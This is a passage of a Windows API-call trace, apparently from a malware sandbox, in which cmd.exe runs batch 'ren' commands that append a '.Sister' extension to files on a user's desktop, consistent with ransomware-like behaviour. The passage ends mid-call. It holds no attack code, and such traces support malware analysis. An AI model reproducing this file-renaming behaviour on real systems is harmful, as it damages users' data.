[0148.197] GetProcessHeap () returned 0x21ed8c70000 [0148.197] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9374930 [0148.197] _wcsicmp (_String1="i6gjWm0aNWU1xM.swf", _String2=".") returned 59 [0148.197] _wcsicmp (_String1="i6gjWm0aNWU1xM.swf", _String2="..") returned 59 [0148.198] GetFileAttributesW (lpFileName="i6gjWm0aNWU1xM.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\i6gjwm0anwu1xm.swf")) returned 0x20 [0148.198] GetProcessHeap () returned 0x21ed8c70000 [0148.198] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93b0230 [0148.200] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93b0240 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0148.200] SetErrorMode (uMode=0x0) returned 0x0 [0148.200] SetErrorMode (uMode=0x1) returned 0x0 [0148.200] GetFullPathNameW (in: lpFileName="i6gjWm0aNWU1xM.swf", nBufferLength=0x7fe7, lpBuffer=0x21ed919fe40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\i6gjWm0aNWU1xM.swf", lpFilePart=0xa6cf4fd660*="i6gjWm0aNWU1xM.swf") returned 0x2a [0148.201] SetErrorMode (uMode=0x0) returned 0x1 [0148.201] GetProcessHeap () returned 0x21ed8c70000 [0148.201] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93730d0 [0148.201] _wcsicmp (_String1="i6gjWm0aNWU1xM.swf", _String2=".") returned 59 [0148.201] _wcsicmp (_String1="i6gjWm0aNWU1xM.swf", _String2="..") returned 59 [0148.201] GetFileAttributesW (lpFileName="i6gjWm0aNWU1xM.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\i6gjwm0anwu1xm.swf")) returned 0x20 [0148.201] ??_V@YAXPEAX@Z () returned 0x1 [0148.201] malloc (_Size=0xffce) returned 0x21ed919fe40 [0148.201] ??_V@YAXPEAX@Z () returned 0x21ed919fe40 [0148.201] malloc (_Size=0xffce) returned 0x21ed91afe20 [0148.201] ??_V@YAXPEAX@Z () returned 0x21ed91afe20 [0148.202] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\i6gjWm0aNWU1xM.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\i6gjwm0anwu1xm.swf")) returned 0x20 [0148.202] malloc (_Size=0xffce) returned 0x21ed91bfe00 [0148.202] ??_V@YAXPEAX@Z () returned 0x21ed91bfe00 [0148.202] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\i6gjWm0aNWU1xM.swf", fInfoLevelId=0x1, lpFindFileData=0x21ed9374940, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9374940) returned 0x21ed8d43090 [0148.202] malloc (_Size=0xffce) returned 0x21ed91cfde0 [0148.202] ??_V@YAXPEAX@Z () returned 0x21ed91cfde0 [0148.203] ??_V@YAXPEAX@Z () returned 0x1 [0148.203] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\i6gjWm0aNWU1xM.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\i6gjwm0anwu1xm.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\i6gjWm0aNWU1xM.swf.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\i6gjwm0anwu1xm.swf.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0148.203] FindNextFileW (in: hFindFile=0x21ed8d43090, lpFindFileData=0x21ed9374940 | out: lpFindFileData=0x21ed9374940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc2bba0, ftCreationTime.dwHighDateTime=0x1d5f00b, ftLastAccessTime.dwLowDateTime=0xf22a9ec0, ftLastAccessTime.dwHighDateTime=0x1d5ef71, ftLastWriteTime.dwLowDateTime=0xf22a9ec0, ftLastWriteTime.dwHighDateTime=0x1d5ef71, nFileSizeHigh=0x0, nFileSizeLow=0x15b63, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6gjWm0aNWU1xM.swf", cAlternateFileName="")) returned 0 [0148.205] GetLastError () returned 0x12 [0148.205] FindClose (in: hFindFile=0x21ed8d43090 | out: hFindFile=0x21ed8d43090) returned 1 [0148.205] ??_V@YAXPEAX@Z () returned 0x1 [0148.205] ??_V@YAXPEAX@Z () returned 0x1 [0148.207] ??_V@YAXPEAX@Z () returned 0x1 [0148.208] ??_V@YAXPEAX@Z () returned 0x1 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d436f0 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95ac0, Size=0x16) returned 0x21ed8c95500 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95500) returned 0x16 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d66660 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66660, Size=0xb2) returned 0x21ed8d66660 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66660) returned 0xb2 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9376ae0 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9376ae0, Size=0x30) returned 0x21ed9376ae0 [0148.208] GetProcessHeap () returned 0x21ed8c70000 [0148.208] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9376ae0) returned 0x30 [0148.209] GetProcessHeap () returned 0x21ed8c70000 [0148.209] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9376b20 [0148.209] malloc (_Size=0x1ff9c) returned 0x21ed919fe40 [0148.210] GetProcessHeap () returned 0x21ed8c70000 [0148.210] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47150 [0148.210] GetProcessHeap () returned 0x21ed8c70000 [0148.210] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d48350 [0148.210] ??_V@YAXPEAX@Z () returned 0x1 [0148.210] malloc (_Size=0x1ff9c) returned 0x21ed919fe40 [0148.210] GetProcessHeap () returned 0x21ed8c70000 [0148.210] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47210 [0148.210] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed919fe40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0148.210] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d464e0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d433f0 [0148.211] FindClose (in: hFindFile=0x21ed8d433f0 | out: hFindFile=0x21ed8d433f0) returned 1 [0148.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d464e0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42d90 [0148.211] FindClose (in: hFindFile=0x21ed8d42d90 | out: hFindFile=0x21ed8d42d90) returned 1 [0148.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x82f1e5c5, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x82f1e5c5, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d464e0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d437b0 [0148.211] FindClose (in: hFindFile=0x21ed8d437b0 | out: hFindFile=0x21ed8d437b0) returned 1 [0148.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x82f1e5c5, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x82f1e5c5, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d464e0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0148.212] malloc (_Size=0x1ff9c) returned 0x21ed91bfdf0 [0148.212] ??_V@YAXPEAX@Z () returned 0x21ed91bfdf0 [0148.213] GetProcessHeap () returned 0x21ed8c70000 [0148.213] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d465c0 [0148.213] ??_V@YAXPEAX@Z () returned 0x1 [0148.213] ??_V@YAXPEAX@Z () returned 0x1 [0148.213] GetProcessHeap () returned 0x21ed8c70000 [0148.213] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9376b20, Size=0x490) returned 0x21ed9376b20 [0148.213] GetProcessHeap () returned 0x21ed8c70000 [0148.213] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9376b20) returned 0x490 [0148.213] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0148.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.213] GetFileType (hFile=0x50) returned 0x2 [0148.213] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.213] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0148.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.216] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0148.229] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0148.229] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0148.229] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0148.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.229] GetFileType (hFile=0x50) returned 0x2 [0148.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.229] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0148.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.260] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0148.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.278] GetFileType (hFile=0x50) returned 0x2 [0148.278] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.278] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0148.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.286] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9376af0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9376af0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0148.348] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0148.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.348] GetFileType (hFile=0x50) returned 0x2 [0148.348] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.348] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0148.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.358] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0148.441] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0148.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.441] GetFileType (hFile=0x50) returned 0x2 [0148.441] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.441] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0148.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.452] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0148.471] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0148.476] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0148.476] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0148.476] malloc (_Size=0xffce) returned 0x21ed919fe40 [0148.476] ??_V@YAXPEAX@Z () returned 0x21ed919fe40 [0148.476] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0148.476] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0148.476] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0148.476] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0148.476] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0148.476] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0148.476] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0148.476] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0148.476] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0148.476] ??_V@YAXPEAX@Z () returned 0x1 [0148.476] GetProcessHeap () returned 0x21ed8c70000 [0148.476] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d66730 [0148.476] GetProcessHeap () returned 0x21ed8c70000 [0148.476] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66730, Size=0x130) returned 0x21ed8d66730 [0148.477] GetProcessHeap () returned 0x21ed8c70000 [0148.477] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66730) returned 0x130 [0148.477] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0148.477] malloc (_Size=0xffce) returned 0x21ed919fe40 [0148.477] ??_V@YAXPEAX@Z () returned 0x21ed919fe40 [0148.477] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0148.477] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed919fe40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0148.478] ??_V@YAXPEAX@Z () returned 0x1 [0148.478] GetProcessHeap () returned 0x21ed8c70000 [0148.478] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d66870 [0148.478] GetProcessHeap () returned 0x21ed8c70000 [0148.478] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d669b0 [0148.478] GetProcessHeap () returned 0x21ed8c70000 [0148.478] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d669b0, Size=0x130) returned 0x21ed8d669b0 [0148.478] GetProcessHeap () returned 0x21ed8c70000 [0148.478] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d669b0) returned 0x130 [0148.478] malloc (_Size=0xffce) returned 0x21ed919fe40 [0148.478] ??_V@YAXPEAX@Z () returned 0x21ed919fe40 [0148.478] GetProcessHeap () returned 0x21ed8c70000 [0148.478] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d437b0 [0148.479] GetProcessHeap () returned 0x21ed8c70000 [0148.479] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9373d00 [0148.479] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0148.479] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0148.479] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0148.479] GetLastError () returned 0x2 [0148.479] GetProcessHeap () returned 0x21ed8c70000 [0148.479] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93c0220 [0148.479] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93c0230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0148.479] SetErrorMode (uMode=0x0) returned 0x0 [0148.479] SetErrorMode (uMode=0x1) returned 0x0 [0148.479] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed919fe40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0148.479] SetErrorMode (uMode=0x0) returned 0x1 [0148.479] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0148.479] GetProcessHeap () returned 0x21ed8c70000 [0148.479] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93735b0 [0148.479] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0148.479] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0148.479] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0148.480] GetLastError () returned 0x2 [0148.480] ??_V@YAXPEAX@Z () returned 0x1 [0148.480] malloc (_Size=0xffce) returned 0x21ed919fe40 [0148.480] ??_V@YAXPEAX@Z () returned 0x21ed919fe40 [0148.480] malloc (_Size=0xffce) returned 0x21ed91afe20 [0148.480] ??_V@YAXPEAX@Z () returned 0x21ed91afe20 [0148.480] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0148.480] GetLastError () returned 0x2 [0148.480] _get_osfhandle (_FileHandle=2) returned 0x54 [0148.480] GetFileType (hFile=0x54) returned 0x2 [0148.480] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0148.480] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0148.486] _get_osfhandle (_FileHandle=2) returned 0x54 [0148.486] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0148.489] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0148.489] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0148.489] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0148.498] longjmp () [0148.498] ??_V@YAXPEAX@Z () returned 0x1 [0148.498] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0047750, ftCreationTime.dwHighDateTime=0x1d5e9db, ftLastAccessTime.dwLowDateTime=0xc70c040, ftLastAccessTime.dwHighDateTime=0x1d5e8b8, ftLastWriteTime.dwLowDateTime=0xc70c040, ftLastWriteTime.dwHighDateTime=0x1d5e8b8, nFileSizeHigh=0x0, nFileSizeLow=0xdffe, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="jQv-1A.gif", cAlternateFileName="")) returned 1 [0148.498] GetProcessHeap () returned 0x21ed8c70000 [0148.498] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d663d0, Size=0x294) returned 0x21ed8d66af0 [0148.501] GetProcessHeap () returned 0x21ed8c70000 [0148.501] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66af0) returned 0x294 [0148.501] GetProcessHeap () returned 0x21ed8c70000 [0148.501] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9376fc0 [0148.501] GetProcessHeap () returned 0x21ed8c70000 [0148.501] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9376fc0, Size=0x30) returned 0x21ed9376fc0 [0148.502] GetProcessHeap () returned 0x21ed8c70000 [0148.502] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9376fc0) returned 0x30 [0148.502] GetProcessHeap () returned 0x21ed8c70000 [0148.502] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9377000 [0148.502] malloc (_Size=0x1ff9c) returned 0x21ed91bfe00 [0148.503] GetProcessHeap () returned 0x21ed8c70000 [0148.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x26) returned 0x21ed8d45da0 [0148.503] ??_V@YAXPEAX@Z () returned 0x1 [0148.503] GetProcessHeap () returned 0x21ed8c70000 [0148.503] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377000, Size=0x120) returned 0x21ed9377000 [0148.503] GetProcessHeap () returned 0x21ed8c70000 [0148.503] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9377000) returned 0x120 [0148.503] GetProcessHeap () returned 0x21ed8c70000 [0148.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9377130 [0148.503] GetProcessHeap () returned 0x21ed8c70000 [0148.504] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377130, Size=0x290) returned 0x21ed9377130 [0148.504] GetProcessHeap () returned 0x21ed8c70000 [0148.504] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9377130) returned 0x290 [0148.504] GetProcessHeap () returned 0x21ed8c70000 [0148.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93773d0 [0148.504] GetProcessHeap () returned 0x21ed8c70000 [0148.504] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93773d0, Size=0x30) returned 0x21ed93773d0 [0148.504] GetProcessHeap () returned 0x21ed8c70000 [0148.504] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93773d0) returned 0x30 [0148.504] GetProcessHeap () returned 0x21ed8c70000 [0148.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9377410 [0148.504] malloc (_Size=0x1ff9c) returned 0x21ed91bfe00 [0148.504] GetProcessHeap () returned 0x21ed8c70000 [0148.504] RtlAllocateHeap 